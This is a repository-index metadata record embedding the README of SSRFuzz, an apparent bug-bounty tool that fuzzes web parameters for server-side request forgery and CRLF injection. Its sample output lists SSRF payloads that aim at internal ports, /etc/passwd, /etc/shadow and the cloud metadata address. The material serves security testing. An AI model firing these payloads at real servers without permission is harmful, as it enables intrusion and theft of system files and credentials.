{"id":13842409,"url":"https://github.com/ryandamour/ssrfuzz","last_synced_at":"2026-02-20T15:30:40.005Z","repository":{"id":40519498,"uuid":"329139145","full_name":"ryandamour/ssrfuzz","owner":"ryandamour","description":"SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities","archived":false,"fork":false,"pushed_at":"2021-03-02T08:14:49.000Z","size":52,"stargazers_count":183,"open_issues_count":4,"forks_count":20,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-07-11T15:55:29.123Z","etag":null,"topics":["bugbounty","security","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ryandamour.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-01-12T23:26:41.000Z","updated_at":"2025-05-29T03:29:21.000Z","dependencies_parsed_at":"2022-08-04T02:30:25.868Z","dependency_job_id":null,"html_url":"https://github.com/ryandamour/ssrfuzz","commit_stats":null,"previous_names":[],"tags_count":7,"template":false,"template_full_name":null,"purl":"pkg:github/ryandamour/ssrfuzz","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ryandamour","download_url":"https://codeload.github.com/ryandamour/ssrfuzz/
tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryandamour%2Fssrfuzz/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29655290,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-20T09:27:29.698Z","status":"ssl_error","status_checked_at":"2026-02-20T09:26:12.373Z","response_time":59,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","security","ssrf"],"created_at":"2024-08-04T17:01:33.961Z","updated_at":"2026-02-20T15:30:39.971Z","avatar_url":"https://github.com/ryandamour.png","language":"Go","funding_links":[],"categories":["漏洞扫描","Go"],"sub_categories":[],"readme":"# SSRFUZZ\n\nSSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities\n\n## Why?\n- I wanted to write a tool in Golang for concurrency\n- I wanted to fuzz parameters for SSRF vulnerabilities, as well as fuzz _both_ paths and parameters for CRLF injections\n- I was inspired by Orange's work for chaining these types of vulnerabilities together (https://blog.orange.tw)\n\n## Installation\n\nRun the following command to install\n\n```bash\ngo get -u github.com/ryandamour/ssrfuzz\n```\n\n## Usage\n\n```go\n\n  ██████   ██████  ██▀███    █████▒█    ██ ▒███████▒▒███████▒\n▒██    ▒ ▒██    ▒ ▓██ ▒ ██▒▓██   ▒ ██  ▓██▒▒ ▒ ▒ ▄▀░▒ 
▒ ▒ ▄▀░\n░ ▓██▄   ░ ▓██▄   ▓██ ░▄█ ▒▒████ ░▓██  ▒██░░ ▒ ▄▀▒░ ░ ▒ ▄▀▒░ \n  ▒   ██▒  ▒   ██▒▒██▀▀█▄  ░▓█▒  ░▓▓█  ░██░  ▄▀▒   ░  ▄▀▒   ░\n▒██████▒▒▒██████▒▒░██▓ ▒██▒░▒█░   ▒▒█████▓ ▒███████▒▒███████▒\n▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░ ▒▓ ░▒▓░ ▒ ░   ░▒▓▒ ▒ ▒ ░▒▒ ▓░▒░▒░▒▒ ▓░▒░▒\n░ ░▒  ░ ░░ ░▒  ░ ░  ░▒ ░ ▒░ ░     ░░▒░ ░ ░ ░░▒ ▒ ░ ▒░░▒ ▒ ░ ▒\n░  ░  ░  ░  ░  ░    ░░   ░  ░ ░    ░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░\n      ░        ░     ░               ░       ░ ░      ░ ░    \n                                           ░        ░        \n\n===============================================================\nSSRFUZZ 1.2\nby Ryan D'Amour @ryandamour \n===============================================================A scanner for all your SSRF Fuzzing needs\n\nUsage:\n  ssrfuzz scan [flags]\n\nFlags:\n  -b, --call-back string       Add callback for SSRF fuzzing (ie: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)\n  -c, --cookie string          Cookie to use for requests\n      --crlf-path              Add CRLF payloads to all available paths (ie: site.com/%0Atest.php)\n      --delay int              The time each threads waits between requests in milliseconds (default 100)\n  -d, --domains string         Location of domains with parameters to scan\n  -h, --help                   help for scan\n  -x, --http-method string     HTTP Method - GET or POST (default \"GET\")\n  -o, --output string          Location to save results\n      --skip-crlf              Skip CRLF fuzzing\n      --skip-network           Skip network fuzzing\n      --skip-scheme            Skip scheme fuzzing\n  -s, --slack-webhook string   Slack webhook to send findings to a channel\n  -t, --threads int            Number of threads to run ssrfuzz on (default 50)\n      --timeout int            The amount of time needed to close a connection that could be hung (default 10)\n  -u, --user-agent string      User agent for requests (default \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/81.0.4044.138 Safari/537.36\")\n  -v, --verbose                verbose output\n```\n\n```bash\nUsage: \necho \"http://url_to_fuzz\" | ssrfuzz scan\ncat file_of_domains.txt | ssrfuzz scan\nssrfuzz scan -d file_of_domains.txt\n```\n\n```go\n* Scanning http and scheme payloads w/ crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan\n \n[!] Scheme payload match:\n* http://192.168.1.10/test.php?u=file://etc/passwd 200\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200\n* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500\n* http://192.168.1.10test.php?u=http://127.1.0.0:22 500\n* http://192.168.1.10/test.ph?u=http://127.1.0.0:25 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n```\n\n```go\n* Scanning only http payloads w/ crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-scheme\n\n[!] 
Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500\n* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500\n```\n\n```go\n* Scanning only http payloads w/o crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-scheme --skip-crlf\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200\n* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:22 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:25 500\n* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500\n```\n\n```go\n* Scanning only scheme payloads w/o crlf:\n\necho \"http://192.168.1.10/test.php?u=\" | go run main.go scan --skip-network --skip-crlf\n\n[!] Interesting payloads found\n* http://192.168.1.10/test.php?u=file:///etc/passwd 200\n* http://192.168.1.10/test.php?u=file:///etc/shadow 500\n* http://192.168.1.10/test.php?u=file://169.254.169.254/ 500\n```\n\n\n## Contributing\nPull requests are welcome. 
For major changes, please open an issue first to discuss what you would like to change.\n\nPlease make sure to update tests as appropriate.\n\n## License\n[MIT](https://choosealicense.com/licenses/mit/)\n\n## Sponsored By\n[Stage2Security](https://www.stage2sec.com)\n![alt text](https://miro.medium.com/max/168/1*Pzr_iwx12ycGpGg0K0Yauw.png)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryandamour%2Fssrfuzz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fryandamour%2Fssrfuzz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryandamour%2Fssrfuzz/lists"}